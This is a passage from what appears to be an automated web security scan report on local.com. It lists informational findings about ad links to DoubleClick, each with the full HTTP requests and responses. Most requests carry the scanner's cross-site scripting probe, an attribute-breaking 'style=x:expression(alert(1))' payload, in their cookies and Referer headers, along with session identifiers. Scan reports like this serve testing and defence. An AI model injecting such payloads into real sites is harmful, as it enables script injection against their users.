localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:13 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.14. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=2;tile=2;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.15. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748848750&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?

Request

GET /dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748848750&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.16. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag\\x3dTrue\\x26css\\x3dbanner\\x26p\\x3dlocm.sp\\x26pos\\x3d1\\x26t\\x3d1\\x26sz\\x3d728x90\\x26ord\\x3d1296748848750\\x26k\\x3dbanks\\x26l\\x3dDallas%2C+TX\\x26cat\\x3dcat%3Dfinancial_services\\x26zone\\x3dlocm.sp%2Fretail_banks_15020100\

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?
http://ad.doubleclick.net/jump/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?

Request

GET /dart/?ag\\x3dTrue\\x26css\\x3dbanner\\x26p\\x3dlocm.sp\\x26pos\\x3d1\\x26t\\x3d1\\x26sz\\x3d728x90\\x26ord\\x3d1296748848750\\x26k\\x3dbanks\\x26l\\x3dDallas%2C+TX\\x26cat\\x3dcat%3Dfinancial_services\\x26zone\\x3dlocm.sp%2Fretail_banks_15020100\ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 768
Date: Thu, 03 Feb 2011 16:43:52 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?" target="_blank"><img src="http://ad.doubleclick.net/ad/;dcopt=ist;kw=;pos=;tile=;city=;sz=;ord=9159411650520743936?" border="0" alt="" /></a>
...[SNIP]...

8.17. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.18. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?

Request

GET /dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.19. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.20. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748869864?

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.21. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748882748?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
